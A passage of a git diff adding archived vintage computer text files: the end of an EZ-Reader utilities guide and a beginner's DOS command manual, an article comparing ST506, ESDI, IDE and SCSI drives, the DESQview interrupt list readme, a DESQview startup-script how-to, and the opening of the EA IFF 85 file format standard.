Procedure: + +Follow the procedures in Method #2 to download a PC Board capture +file or Method #3 to download a ProDoor ZIPM mail packet. + + +Off-line Procedure: + +Make sure the PC Board capture file or the ProDoor ZIPM mail +packet is in the download directory you specified in EZ-Reader's +configuration file, the EZ-Reader utilities are in the your +EZ-Reader directory, and that you are in the EZ-Reader directory +when use run the utilities. PKZIP and PKUNZIP must be located in +the directory you specified in EZ-Reader's configuration file or +must be located in the path. + + + Converting PC Board capture files: + + PCB2QWK.EXE converts the PC Board capture file into a + QMail/MarkMail format file (*.QWK) readable only by + EZ-Reader. + + At the DOS prompt, type: + + PCB2QWK pcb_filename[with no ext] + + You do not need to type the extension. PCB2QWK.EXE + supplies the default extension CAP. The resulting + Qmail/MarkMail mail packet will be placed in the + download directory you set in EZ-Reader's + configuration file. + + EZ-Reader can not handle more than 200 messages per + conference. If you have more than 200 messages per + conference, you will have to break up the PCB capture file + into smaller files with less than 200 messages per + conference before using PCB2QWK.EXE. + + + Converting ProDoor ZIPM mail packets: + + ZIPM2QWK.EXE converts the ProDoor ZIPM mail packet file + into a QMail/MarkMail format file (*.QWK) readable only + by EZ-Reader. + + At the DOS prompt, type: + + ZIPM2QWK zipm_filename[with no ext] + + You do not need to type the extension. ZIPM2QWK.EXE + supplies the default extension ZIP. The resulting + Qmail/MarkMail mail packet will be placed in the + download directory you set in EZ-Reader's + configuration file. + + ProDoor should only allow you to download 200 messages + per ZIPM mail packet. Therefore, ZIPM2QWK does not check + to see if you have more than 200 messages per conference. + + +Use EZ-Reader to read and reply to the resulting *.QWK files. + + + Converting replies *.REP for uploading: + + For *.REP packets resulting from a *.QWK that was created + from a PC Board capture file - + + REP2PCB.EXE converts reply file (*.REP) created by + EZ-Reader into an ASCII file that can be uploaded to PC + Board. This ASCII file must be uploaded using a script + that you create using your communications software. + A sample Qmodem script file is included in EZUTL103.ZIP. + At the DOS prompt, type: + + REP2PCB

in the place of an + extension. + + The CHDIR command allows you to change to any of the sub- + directories. You need to do this to use the programs in any + sub-directory. + + EXAMPLE: + + To change to a sub-directory called WP, type the command as + shown below: + + CHDIR(sp)\WP + + The command can be abbreviated to CD: + CD(sp)\WP + + After executing this command, you will be in the WP + directory. To go back to the main directory, type the + following command: + + CHDIR(sp).. or CHDIR\ + -or- + CD(sp).. or CD\ + + Commands given while in a sub-directory act on that + directory only. + + + CHKDSK + + CHKDSK is an external command. + + The CHKDSK command allows you to check any disk on your + computer. It looks for bad sectors on the disk and also + tells you how much memory is available on your computer. + + Use this command from time to time to check important floppy + disks and to check your hard disk drive for problems. If + you begin to see bad sectors on your hard disk drive, and + the number of bad sectors starts to increase, the hard disk + drive may be developing problems. Remember: most hard disk + drives have some bad sectors, so watch for increases. + + + + + + + + + + + + + Page 10 + + + + Example: + + To check the disk in drive A:, use the following command: + + CHKDSK(sp)A: + + To check your hard disk: + + CHKDSK(sp)C: + + You can substitute any drive name. + + NOTE: Since this is an external command, you must insert + your DOS disk in drive A: or CHDIR to the directory which + contains DOS external commands on your hard disk. + + + CLS + + + CLS is an internal command. + + The CLS command clears your computer's screen and moves the + system prompt to the top of the screen. + + Example: + + To clear the screen, type the following command: + + CLS + + + COPY + + COPY is an internal command. + + The principal use of the COPY command is to copy files from + one disk or directory to another. It's use is very simple. + + Example: + + To copy the file LETTER.DOC from drive A: to drive B:, enter + the following command: + + COPY(sp)A:LETTER.DOC(sp)B: + + To copy LETTER.DOC to Drive B: and change its name on drive + B: to LETTER1.DOC, type the following: + + COPY(sp)A:LETTER.DOC(sp)B:LETTER1.DOC + + + + + + + + + + + + + Page 11 + + + + To copy LETTER.DOC from the WP sub-directory on drive C: to + drive B:, use this format: + + COPY(sp)C:\WP\LETTER.DOC(sp)B: + + Wildcards + + DOS also allows you to copy more than one file at once. Two + symbols, called wildcards, allow you to specify groups of + files. Here are the wildcards: + + * indicates any group of characters. + ? indicates a single character. + + Examples: + + To copy all the files with the extension .DOC from drive A: + to drive B:, use this command: + + COPY(sp)A:*.DOC(sp)B: + + To copy ALL files from drive A: to drive B: + + COPY(sp)A:*.*(sp)B: + + NOTE: Wildcards will not copy files within subdirectories, + unless you are in that subdirectory or have a path statement + including the subdirectory. + + To copy LETTER1.DOC, LETTER2.DOC, etc. from drive A: to + drive B: + + COPY(sp)A:LETTER?.DOC(sp)B: + + NOTE: If you are copying to a blank diskette, you must + FORMAT the diskette first.(See the FORMAT command) + + The COPY command, along with most other DOS commands can be + used with PATH statements to copy files into subdirectories. + See the section on the PATH command for more information. + + + DEL or ERASE + + DEL and ERASE are internal commands. + + These commands are identical, and can be used + interchangeably. The delete files from a disk, so use them + carefully. + + Examples: + + To delete LETTER.DOC from drive B: + + + + + + + + + + Page 12 + + + + DEL(sp)B:LETTER.DOC + + Similarly, to delete LETTER.DOC from the directory WP on + drive C: + + DEL(sp)C:\WP\LETTER.DOC + + You can use wildcard characters with DEL and ERASE, in the + same way you did with the COPY command. + + Example: + + To delete all files with the extension .DOC from drive B: + + DEL(sp)B:*.DOC + + To delete ALL files from drive B: + + DEL(sp)B:*.* + + Any time you use the *.* wildcard to delete files, the + computer will ask you: + + Are you sure Y/N? + + Check what you are doing, then, if you are sure you want to + delete all files from that disk, type Y, then press the + Enter key. + + As with the COPY command, path information can be added to + the drive specification, if needed. + + CAUTION: Use extreme care when using wildcards with the DEL + or ERASE command. Pay special attention to the drive name + you have designated. It is possible to inadvertently delete + all files on your hard disk with a single keystroke. BE + CAREFUL! + + + DIR + + DIR is an internal command. + + The DIR command allows you to see a list of the files stored + on any disk. Along with the filenames, it also provides + other information about the files. + + Examples: + + To see a list of files on drive A: + + DIR(sp)A: + + + + + + + + + + + Page 13 + + + You will see a list of files, along with the size of each + file in bytes, and the date and time that data was last + entered in that file. In addition, the amount of space left + on the disk will be displayed. + + Sometimes, a disk will have more files than can be displayed + on the screen. Using the DIR command will cause the files + to scroll off the top of the screen faster than you can read + them. To avoid this, add the parameter /P. Here is an + example: + + DIR(sp)B:/P + + DOS will fill the screen with file information, then print + at the bottom of the screen: + + Press a key to continue: + + After you press ANY key, another screenfull of data will be + displayed. This continues until the entire directory has + been presented. + + There is another option with DIR. To see a list of files on + disk A:, arranged in multiple columns, but without file size + and other information: + + DIR(sp)A:/W + + + NOTE: Use the DIR command frequently to check on the files + on your disks and to keep track of the amount of disk space + available. + + + DISKCOPY + + DISKCOPY is an external command. + + Use DISKCOPY to make exact duplicates of floppy disks. You + can only use this command on floppy disk drives, typically + drive A: and drive B: + + To copy a disk on a single drive computer: + + DISKCOPY + + The computer will ask you to: + + Place the SOURCE diskette in Drive A: then press Enter. + + After pressing the Enter key, the computer will read all the + data on the disk, then ask you to: + + Place the TARGET diskette in Drive A: and press Enter: + + + + + + + + + + Page 14 + + + + Remove the original disk, and replace it with a blank disk. + After you press Enter, the data will be copied onto the + blank disk. + + On a computer with two floppy disk drives: + + DISKCOPY(sp)A:(sp)B: + + You will see the following: + + Place SOURCE diskette in Drive A: + Place TARGET diskette in Drive B: + Strike a key when ready: + + Place the original disk in drive A: and the blank disk in + drive B:. Press a key, and the computer will make a copy + for you. + + When the process is complete, you will see: + + Make another copy? Y/N? + + Enter a Y to start the process again, or N to return to the + system prompt. + + Note: If the new disk is not formatted, DISKCOPY will + automatically format it before copying. + + CAUTION: Make sure the second disk does not contain data, + since the DISKCOPY command will destroy any data on the + disk. + + You cannot use the DISKCOPY command with drives other than + A: or B:. + + + FORMAT + + FORMAT is an external command. + + Before you can write data onto a floppy disk, it must be + formatted to hold the data. DOS has a command which does + this automatically. + + To format a disk in Drive A: + + FORMAT(sp)A: + + You will see on the screen: + + Insert a new diskette for Drive A: + Press ENTER when ready. + + + + + + + + + + + Page 15 + + + Place an unformatted disk in Drive A: and press the Enter + key. DOS will format the disk and make it ready to accept + data. When the process is complete, you will see: + + Format Complete: Format another? Y/N? + + If you want to format more diskettes, press Y, and the + process will repeat. If not, press N and you will return to + the system prompt. + + CAUTION: Like DISKCOPY, FORMAT destroys all data on the + disk. Use caution when formatting disks. + + WARNING!!!! In some versions of DOS, FORMAT can act on + Drive C: or other hard disk drives. If it does, all data on + your hard disk will be destroyed. Because of this, ALWAYS + indicate the drive to be formatted. Check your typing + carefully when using this command. + + + MKDIR + + + MKDIR is an internal command + + The MKDIR command allows you to create new sub-directories. + + Examples: + + To create a new subdirectory, called CHAPTER1 on drive C: + + MKDIR(sp)C:\CHAPTER1 + + To create a subdirectory within a subdirectory, for example + to create the subdirectory CHAPTER1 in the directory NOVEL + on drive C: + + MKDIR(sp)C:\NOVEL\CHAPTER1 + + If you are already in the directory in which you want to + place a subdirectory, you do not need the \ character. For + example, If you had used the CHDIR or CD command to move to + the NOVEL subdirectory, create the CHAPTER1 subdirectory + like this: + + MKDIR(sp)CHAPTER1 + + Note: You can abbreviate the MKDIR command to MD. + + Example: + + MD(sp)CHAPTER1 + + + + + + + + + + + + Page 16 + + + CAUTION: Be certain you know which directory you are in + before using the simplified form of this command. Otherwise + you may create a subdirectory in an unwanted place. To + avoid confusion, use the full format, including drive name, + as in the first and second examples. + + + PATH + + PATH is an internal command. + + If your computer has a hard disk drive, many of the programs + you use, along with data files, will be stored in + subdirectories. Normally, you have to change directories + with the CHDIR (CD) command to get access to files. + + DOS provides another method with the PATH command. This + command allows you to tell DOS where to look for your files. + You can instruct the computer to look in several places for + any file you name in another command, or from a program. + + Examples: + + To tell DOS to look for your wordprocessing programs and + files for the NOVEL subdirectory, as used as an example in + other parts of this manual: + + PATH(sp)\WP\NOVEL + + Using this format, DOS will automatically search the \WP + directory and the \NOVEL subdirectory for files when you + give a command from any other directory. + + Now, suppose you have a number of programs you use + frequently. They are in different subdirectories with the + following names: \DB \WP \123 \MAIL & \SALES. + + In addition, there are further subdirectories, such as + \NOVEL in the \WP directory and \BUSINESS and \PERSONAL in + the \MAIL directory. + + The following command will allow you access to all the + programs listed above: + + PATH(sp)\DB;\WP\NOVEL;\123;\MAIL\BUSINESS\PERSONAL;\SALES + + Notice that the main directories are separated with semi- + colons, while subdirectories of these directories are + specified with the backslash (\) character. + + NOTE: If a path you specify does not exist, DOS will give + the following message: + + No Path + + + + + + + + + + Page 17 + + + + If DOS cannot find the file you specify in any of the + subdirectories, this message will appear: + + Bad command or filename + + In either case, check your path command to make certain it + is correct. If you type PATH without any other + information, DOS will display your current path designation. + + NOTE: Along with the directory names, you can also include + drive names in a PATH command. Use this feature to make DOS + look on your floppy drives for files. + + + REN + + + REN is an internal command. + + Use the REN command to change the name of a file. + + Example: + + To change the file LETTER.DOC to LETTER2.DOC: + + REN(sp)LETTER.DOC(sp)LETTER2.DOC + + + RMDIR + + + RMDIR is an internal command. + + RMDIR, or its abbreviated form RD, removes a subdirectory + from a disk. Before removing the directory, however, all + files in that directory must be deleted with the DEL or + ERASE commands. + + Example: + + To remove the \WP directory from your hard disk: + + Enter the following series of commands. + + CD(sp)\WP + + DEL(sp)*.* + + CD(sp).. + + RMDIR(sp)\WP + + + + + + + + + + + + Page 18 + + + CAUTION: Be certain that you really want to delete all the + files in that directory. If there are files you wish to + save, COPY them to another directory, or to a floppy disk + before deleting them. + + + TYPE + + + TYPE is an internal command. + + Use the TYPE command to view the contents of a file on your + monitor. This command is useful only on ASCII files, + meaning files which contain only text. This excludes all + program files, as well as most files created by your word + processing program. + + Example: + + To see the file AUTOEXEC.BAT on drive A: + + TYPE(sp)A:AUTOEXEC.BAT + + You can also specify a path for this command. To see the + file LETTER.DOC in the \WP directory on drive C: + + TYPE(sp)C:\WP\LETTER.DOC + + NOTE:This command will scroll the file on the screen, too + fast for you to read. Special utility programs are + available which will let you see the file one screen at a + time. Most of these files are Public Domain programs and + are available without charge from Public Domain software + suppliers. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Page 19 + + + ERROR MESSAGES + + + When you make a mistake when entering a command, or if + another type of problem occurs, DOS will place an error + message on the screen. The following are the most common + messages you will see. Suggestions for correcting the error + are provided following the message. + + + Bad command or file name + + DOS cannot find the file or command you entered. Check your + typing and the PATH you have specified for errors. + + + Disk Drive Error: Abort, Ignore, Retry? + + DOS has detected an error on a disk drive. Most often, this + message appears when you have forgotten to insert a floppy + disk into the drive, or have failed to close the door. + Correct the problem, then press R for retry. Pressing A + returns you to the system prompt. + + If this message should appear when you are trying to access + your hard disk drive...STOP. Get help from someone who + knows the system well. + + + File cannot be copied onto itself + + You have tried to copy a file to the same filename on the + same drive. Check your command. + + + File not found + + DOS can't find the file you specified. Check your typing + and make sure you have given the correct path. + + + Format failure + + An error has occured when using the FORMAT command. DOS + will provide an explanation with this error message. Take + the appropriate corrective measures. + + + Insufficient disk space + + The disk you are working with does not have enough space to + hold the data. Replace with a new, formatted disk and + repeat the operation. + + + + + + + + + + + Page 20 + + + + Insufficient memory + + Your computer does not have enough memory for the operation + you have named. Consider expanding your system's memory + size. Memory expansion is relatively inexpensive. + + + Invalid Disk Drive + + The drive name you specified does not exist on your + computer. Check your typing. + + + Invalid number of parameters + + You have mis-typed the command or specified information not + acceptable to DOS. Check the command for errors. + + + There are many other error messages you may see on your + screen. For information on these errors, consult your DOS + manual. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Page 21 + + + + WHEN YOUR COMPUTER CRASHES + + No matter how careful you are, there will be times when your + computer gets confused. Usually, when this happens, the + keyboard will lock up and nothing you type will have any + effect. Other problems sometimes occur, including a drive + that won't stop running. + + When using commercial software, these problems are + infrequent, but do happen from time to time. Most often, + you will lock your system up when experimenting with public + domain software, which is less bug-free than most commercial + programs. + + There are four ways to get out of a locked system. Try + these in the order shown below. + + 1. Hold down the key while you press the key. This will often get you out of the program + and return you to the system prompt. If it does, you're + back in business. + + 2. Press the , , and keys at the same time. + Hold each key down as you press the others. This is called a + "warm boot." It usually does the trick, but wipes out + whatever information is stored in your computer's memory. + + 3. Press the switch, if your computer has one. This + will reboot the computer, wiping out all data in current + memory. + + 4. Finally, if none of the other methods work, turn off the + computer, wait a few seconds, then turn it back on. As + before, data stored in memory will be lost. This last + method is absolutely guaranteed, however, to restart your + system. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + INDEX + + SUBJECT PAGE + + ASCII...........................................17 + CARE FOR FLOPPY DISKS............................4 + CHDIR............................................8 + CHKDSK..........................................8 + CLS..............................................9 + COPY.............................................9 + DEL or ERASE....................................10 + DIR.............................................11 + DISK DRIVES AND FLOPPY DISKS.....................3 + DISKCOPY........................................13 + DOS COMMANDS.....................................6 + ERROR MESSAGES..................................19 + EXTERNAL COMMANDS................................7 + FILES AND FILENAMES..............................6 + FLOPPY DISKS.....................................3 + FORMAT..........................................13 + HARD DISK DRIVES.................................5 + INSERTING A FLOPPY DISK..........................4 + INTERNAL COMMANDS................................6 + INTRODUCTION.....................................2 + MKDIR...........................................14 + PATH............................................15 + REN.............................................16 + RMDIR...........................................16 + TYPE............................................17 + WHEN YOUR SYSTEM CRASHES........................20 + WILDCARDS.......................................10 + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/textfiles.com/computers/drives.txt b/textfiles.com/computers/drives.txt new file mode 100644 index 00000000..e73fd1e4 --- /dev/null +++ b/textfiles.com/computers/drives.txt @@ -0,0 +1,82 @@ +DRIVING US CRAZY, BUT FOR A REASON +by Alan Brenden + + In the early days of the PC, there wasn't much involved with the decision-maki +ng process when a new hard disk was to be bought or repaired. The first hard d +isks used Seagate's ST506 technology and that was your choice. + + Times and technology have changed and today's high-performance systems make it + neccessary to match the needs of the system to the storage technology. In thi +s article I will try and explain to you just what are these drives that drive u +s crazy. - ESDI, IDE, and SCSI, when and why. + +ST506/412 (MFM & RLL) + Original the ST506 drives used an encoding method know as Modified Frequency M +odulation (MFM). As the need for bigger drives evolved a new encoding method w +as developed to pack data tighter together. This method is know as Run Length +Limited (RLL). This method involves looking at groups of 16bits rather then ea +ch individual bit. This achieves a kind of compression of the data that allows + roughly 50% more on a disk then MFM. The trade off was that you needed a high +er grade of media and timing is more critical. Prices for media have dropped i +n the last 3 years and RLL drives have just about wiped MFM drives from the mar +ket place. ESDI, SCSI, and IDE also use a type of RLL encoding. + ST506/412 drives have 2 cables, a 34 pin control cable and a 20 pin data cable +. ST506 MFM has a data transfer rate of 625K bytes per second and a storage ca +pacity of 5MB - 100MB. ST506 RLL has a data transfer rate of 937K bytes per se +cond and a storage capacity of 30MB-200MB. + +ESDI + ESDI (Enhanced Small-Device Interface) was developed to allow faster transfer +rates and high disk capacities. Greater intelligence reduces the amount of com +munication between the drive and the controller. The transfer of data between +the drive and the controller uses a pulse code that isn't required to return to + zero between pulses, as does ST506. This is know as Non Return to Zero (NRZ) +and increases data transfer. + ESDI uses the same cables as the ST506 but can never be mixed. It is CPU cont +rolled and is suitable for single tasking environments. ESDI has a data transf +er rate of 1-3M bytes per second and a storage capacity of 80MB - 2GB. One con +troller can handle up to 2 drives with multiple controllers possible. + +IDE +As the name implies, IDE (Integrated Drive Electronics) combines both the disk +and the controller on the same unit. Only a simple interface is needed and typ +ically it is built directly into the motherboard. If the interface is not buil +t into the motherboard a simple paddle-board is used and because so little elec +tronics are needed an additional serial and parallel port is sometime included. + It transfers only data and doesn't need to send format and sector information + as does ESDI. Therefore the data transfer rate can be 3-4 times faster then ES +DI. + The IDE drive is not a device level interface and has the ability to lie to th +e BIOS and give the logical appearance of a know device type, while physically +it may be totally different. You won't see bad tracks on an IDE drive because +the drive hides them. Because of this you can not low level format an IDE driv +e without specific utilities for that drive. + IDE uses a single 40 pin cable. It is limited to a 2 foot cable and 2 address +es with no termination needed. The first drive is configured as the master and + the second as the slave. IDE has a transfer rate of .625MB-2MB bytes per seco +nd and a storage capacity of 20MB-500MB. + + +SCSI + SCSI (Small Computer Systems Interface), pronounced "scuzzy", is a more genera +l version of the IDE interface. SCSI hard disks boast the fastest transfer rat +es of all the discussed technologies, with SCSI 2 having a transfer rate up to +40M bytes per second. SCSI implements 2 ways of boosting transfer rates, fast +and wide. FAST SCSI doubles the clock speed, and WIDE SCSI increases the bus w +idth. SCSI also implements other performance features, including controller ba +sed RAM caching and tag command queuing. By queuing commands the SCSI controll +er can free up the CPU to do other tasks while it finishes its task. SCSI also + has the ability to transfer data to another SCSI device without CPU involvemen +t. + SCSI uses a single 50 pin cable with devices daisy chained together and termin +ated on both ends. Seven devices can be installed per controller with up to fo +ur controllers. SCSI 1 has a data transfer rate of 1-5M bytes per second and a + storage capacity of 20MB-1.5GB. SCSI 2 has a data transfer rate of 1-40M byte +s per second and a storage capacity of 40MB-3GB. + +WHICH IS BEST? + Performance isn't without price. Many applications don't need the performance + of SCSI, it is by far the most expensive. IDE or ESDI will usually suffice fo +r most applications. IDE being the cheapest of the three. SCSI has the added +advantage of the greatest expandability, so if you need SCSI the money is well + spent. diff --git a/textfiles.com/computers/dvinter.1st b/textfiles.com/computers/dvinter.1st new file mode 100644 index 00000000..a4d44d12 --- /dev/null +++ b/textfiles.com/computers/dvinter.1st @@ -0,0 +1,189 @@ +DESQview Interrupt List Release 90.3 Last change 7/15/90 + +Please distribute all of the following files (unmodified) together in an +archive called DVINT390: + DVINTER.1ST this file + DVINTER.LST the DESQview API listing + +--------------------------------------------- + NOTICE NOTICE NOTICE NOTICE + +This compilation is (c) Copyright 1989, 1990 Ralf Brown +Permission is granted to use and redistribute the files comprising the +interrupt listing in any way, provided my name and addresses and the names of +all contributers are preserved, as well as the information on how to obtain +new releases. + +Please send corrections/additions to me rather than distributing a modified +version of the list, so that all may benefit from your contribution. + +This version of the list reverts to the public domain one year after the +date of its release, with the sincere hope that the credits and availability +information are retained. +--------------------------------------------- +The newest release of the full interrupt list list is available in the +following places (please do not ask me to email it, it is just too large +for that): + +On the ARPAnet, by standard anonymous FTP from CS.CMU.EDU [128.2.222.173]. + Change directly to directory /afs/cs.cmu.edu/user/ralf/pub and get the + file interrup.zip which is a link to the current version. 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Information marked with "???" is +known to be incomplete or guesswork. +--------------------------------------------- +This list is the result of the time and effort of a large number of people, +among them + 1/85 Janet Jack (original list) + 1/85 J. Weaver Jr. + 2/85 John Cooper + 2/85 Skip Gilbrech + Bob Jack + 4/85 Jim Kyle + 8/85 John Ruschmeyer ihnp4!vax135!petsd!moncol!john + 8/85 Bill Frolik ihnp4!hplabs!hp-pcd!bill + 8/85 Ross M. Greenberg uunet!utoday!greenber + +10/87 Ralf Brown ralf@cs.cmu.edu become list maintainer + 3/88 Ralf Brown ralf@cs.cmu.edu DESQview API + 2/89 Ralf Brown ralf@cs.cmu.edu VCPI API + 5/90 Mike Weaver 1:264/610 DESQview XDI +--------------------------------------------- +Key to system abbreviations +(unless otherwise indicated, a function is available on all systems) + PC IBM PC + XT IBM PC XT + PORT IBM PC Portable (uses same BIOS as XT) + Jr IBM PCjr + AT IBM PC AT + XT2 IBM PC XT 2 + XT286 IBM PC XT/286 + CONV IBM Convertible + PS IBM PS/2, any model + PS30 IBM PS/2 Model 30 and below + PS50+ IBM PS/2 Models 50,60,70,80 + CGA Color Graphics Adapter + EGA Enhanced Graphics Adapter + VGA Video Graphics Array + MCGA Multi-Color Graphics Array + TopView TopView/DESQview/TaskView/OmniView/other compatibles +--------------------------------------------- +To keep the lawyers happy: + +Microsoft, MS, MS DOS, OS/2 are trademarks of Microsoft Corp. +IBM, PC, PCjr, PC/XT, PC/AT, XT/286, PS/2, TopView are trademarks of IBM Corp. +Compaq is a registered trademark of Compaq Corp. +Turbo C and Turbo Pascal are registered trademarks of Borland International +Tandy 1000 is a registered trademark of Tandy Corp. +DESQview is a trademark of Quarterdeck Office Systems +TaskView and OmniView are trademarks of Sunny Hill Software +10-Net is a trademark of Fox Research, Inc. +Mouse Systems is a trademark of Mouse Systems Corp. +NetWare is a registered trademark of Novell, Inc. +TesSeRact is a trademark of the TesSeRact Development Team. +PC Tools is a trademark of Central Point Software, Inc. +HALO'88 is a trademark of Media Cybernetics. +Banyan is a registered trademark of Banyan Systems, Inc. +StreetTalk, VINES, and Banyan Network Server are trademarks of Banyan Sys, Inc. +386/DOS-Extender is a trademark of Phar Lap Software, Inc. +Various other names are trademarks or registered trademarks of their respective + holders +--------------------------------------------- +What they're saying about the interrupt list: + "A cornucopia of descriptions of interrupt and function calls on the + IBM PC. A great thing to have on your hard disk if you don't have + a Ray Duncan or Peter Norton book handy." + _Turbo_Technix_, July/August 1988, p. 157. +[and that was about the 1/30/88 version, which is less than one-fifth the size + of the current version....] +--------------------------------------------- +If you know of any information not in the list, or which is stated incorrectly, +please let me know! This list would be a pale shadow of its current self if it +weren't for everybody's input. + +Software developers are encouraged to check the list before assigning +interrupts, and to provide me with a list of interrupt calls used (to help +prevent future interrupt conflicts). + + Ralf Brown + +Address e-mail to: + ARPA: ralf@cs.cmu.edu + UUCP: {ucbvax,harvard}!cs.cmu.edu!ralf + BIT: ralf%cs.cmu.edu@cmuccvma + FIDO: Ralf Brown 1:129/3.1 (new address!) + or post a message to the DR_DEBUG echo + CompuServe: >INTERNET:ralf@cs.cmu.edu + +Snail mail: + Ralf Brown + School of Computer Science + Carnegie Mellon University + Pittsburgh, PA 15213 + (please enclose a SASE or e-mail address if you want a speedy reply) + (an air-mail letter costs two international return coupons) + +I reply to all e-mail submissions and inquiries. If you do not receive a reply +within a reasonable time, send your message again, giving a better return path +(on UUCP, a bang path starting at harvard or ucbvax; elsewhere, a path starting +from the ARPA Internet). diff --git a/textfiles.com/computers/dvscript.txt b/textfiles.com/computers/dvscript.txt new file mode 100644 index 00000000..6c94d2da --- /dev/null +++ b/textfiles.com/computers/dvscript.txt @@ -0,0 +1,57 @@ + +This File details the process for creating and using Scripts with DESQview + + What is a startup script you ask? Well, the main benefit is that +it will automate the process of opening the windows that you usually +have to startup by hand. This is particularly useful for SysOp who +run there systems under DESQview. + + Most DESQview scripts are activated by pressing a key +combination, a startup script however automatically starts when you +activate DESQview, Thus: If you run a BBS under DESQview, you can +tell your AUTOEXEC.BAT file to activate DESQview, then DESQview's +will automatically open the window you BBS runs in. This is +convenient in the event of power outages, or other unattended +"Boot-ups". + + The procedure is actually not that complicated, the following +instructions will take you through the process creating and using +DESQview scripts step by step. + + +1) Load DESQview by typing DV at the DOS prompt. + +2) Hold down a shift key and tap ALT. + "This activates the LEARN menu" + +3) Press the = sign. + "= Stands for STARTUP script" + +4) Choose a key combination to invoke the script. + "Although it is a startup script desqview still wants a key +combination, if you have F11 - F12 keys, something like ALT-F11 +would be appropriate as you are unlikely to ever accidentally hit it. + +5) Type an exclamation mark and any name such as !AUTO-OPEN + +6) Desqview is now back at the main menu and is recording every key +stroke you make from now on. Try not to make many mistakes as they +will be recorded as well. Now open all the windows that you want to +be invoked automatically when you startup DESQview. You can +rearrange or use any of the other DESQview features to adjust your +windows to the size and shape you desire. Once everything is the way +you want it to be at startup hold down shift and tap ALT again to +return to the Learn Menu. + +7) Hit the hyphen key to finish the script. + " Your Script hasn't been saved to disk, you will lose it if you +exit DESQview without saving it" + +8) Hit SHIFT-ALT, then hit S to save it. Use the default filename +DESQVIEW.DVS. + +9) Now to sample your work, exit DESQview then reinvoke it and sit +back and watch what happens, your programs should all startup fine. + +Good Job! I hope this is helpful, I wondered how to do this for +quite awhile, It is the most useful feature I think.  \ No newline at end of file diff --git a/textfiles.com/computers/ea.iff.85 b/textfiles.com/computers/ea.iff.85 new file mode 100644 index 00000000..75ea8b23 --- /dev/null +++ b/textfiles.com/computers/ea.iff.85 @@ -0,0 +1,1422 @@ +"EA IFF 85" Standard for Interchange Format Files + +Document Date: January 14, 1985 +From: Jerry Morrison, Electronic Arts +Status of Standard: Released and in use + +1. Introduction + +Standards are Good for Software Developers + +As home computer hardware evolves to better and better media machines, +the demand increases for higher quality, more detailed data. Data +development gets more expensive, requires more expertise and better +tools, and has to be shared across projects. Think about several ports +of a product on one CD-ROM with 500M Bytes of common data! + +Development tools need standard interchange file formats. Imagine +scanning in images of "player" shapes, moving them to a paint program +for editing, then incorporating them into a game. Or writing a theme +song with a Macintosh score editor and incorporating it into an Amiga +game. The data must at times be transformed, clipped, filled out, +and moved across machine kinds. Media projects will depend on data +transfer from graphic, music, sound effect, animation, and script +tools. + +Standards are Good for Software Users + +Customers should be able to move their own data between independently +developed software products. And they should be able to buy data libraries +usable across many such products. The types of data objects to exchange +are open-ended and include plain and formatted text, raster and structured +graphics, fonts, music, sound effects, musical instrument descriptions, +and animation. + +The problem with expedient file formats typically memory dumps is +that they're too provincial. By designing data for one particular +use (e.g. a screen snapshot), they preclude future expansion (would +you like a full page picture? a multi-page document?). In neglecting +the possibility that other programs might read their data, they fail +to save contextual information (how many bit planes? what resolution?). +Ignoring that other programs might create such files, they're intolerant +of extra data (texture palette for a picture editor), missing data +(no color map), or minor variations (smaller image). In practice, +a filed representation should rarely mirror an in-memory representation. +The former should be designed for longevity; the latter to optimize +the manipulations of a particular program. The same filed data will +be read into different memory formats by different programs. + +The IFF philosophy: "A little behind-the-scenes conversion when programs +read and write files is far better than NxM explicit conversion utilities +for highly specialized formats." + +So we need some standardization for data interchange among development +tools and products. The more developers that adopt a standard, the +better for all of us and our customers. + +Here is "EA IFF 1985" + +Here is our offering: Electronic Arts' IFF standard for Interchange +File Format. The full name is "EA IFF 1985". Alternatives and justifications +are included for certain choices. Public domain subroutine packages +and utility programs are available to make it easy to write and use +IFF-compatible programs. + +Part 1 introduces the standard. Part 2 presents its requirements and +background. Parts 3, 4, and 5 define the primitive data types, FORMs, +and LISTs, respectively, and how to define new high level types. Part +6 specifies the top level file structure. Appendix A is included for +quick reference and Appendix B names the committee responsible for +this standard. + +References + +American National Standard Additional Control Codes for Use with ASCII, +ANSI standard 3.64-1979 for an 8-bit character set. See also ISO standard +2022 and ISO/DIS standard 6429.2. + +Amiga[tm] is a trademark of Commodore-Amiga, Inc. + +C, A Reference Manual, Samuel P. Harbison and Guy L. Steele Jr., Tartan +Laboratories. Prentice-Hall, Englewood Cliffs, NJ, 1984. + +Compiler Construction, An Advanced Course, edited by F. L. Bauer and +J. Eickel (Springer-Verlag, 1976). This book is one of many sources +for information on recursive descent parsing. + +DIF Technical Specification (c)1981 by Software Arts, Inc. DIF[tm] is +the format for spreadsheet data interchange developed by Software +Arts, Inc. +DIF[tm] is a trademark of Software Arts, Inc. + +Electronic Arts[tm] is a trademark of Electronic Arts. + +"FTXT" IFF Formatted Text, from Electronic Arts. IFF supplement document +for a text format. + +Inside Macintosh (c) 1982, 1983, 1984, 1985 Apple Computer, Inc., a +programmer's reference manual. +Apple(R) is a trademark of Apple Computer, Inc. +Macintosh[tm] is a trademark licensed to Apple Computer, Inc. + +"ILBM" IFF Interleaved Bitmap, from Electronic Arts. IFF supplement +document for a raster image format. + +M68000 16/32-Bit Microprocessor Programmer's Reference Manual(c) 1984, +1982, 1980, 1979 by Motorola, Inc. + +PostScript Language Manual (c) 1984 Adobe Systems Incorporated. +PostScript[tm] is a trademark of Adobe Systems, Inc. +Times and Helvetica(R) are trademarks of Allied Corporation. + +InterScript: A Proposal for a Standard for the Interchange of Editable +Documents (c)1984 Xerox Corporation. +Introduction to InterScript (c) 1985 Xerox Corporation. + + + +2. Background for Designers + +Part 2 is about the background, requirements, and goals for the standard. +It's geared for people who want to design new types of IFF objects. +People just interested in using the standard may wish to skip this +part. + +What Do We Need? + +A standard should be long on prescription and short on overhead. It +should give lots of rules for designing programs and data files for +synergy. But neither the programs nor the files should cost too much +more than the expedient variety. While we're looking to a future with +CD-ROMs and perpendicular recording, the standard must work well on +floppy disks. + +For program portability, simplicity, and efficiency, formats should +be designed with more than one implementation style in mind. (In practice, +pure stream I/O is adequate although random access makes it easier +to write files.) It ought to be possible to read one of many objects +in a file without scanning all the preceding data. Some programs need +to read and play out their data in real time, so we need good compromises +between generality and efficiency. + +As much as we need standards, they can't hold up product 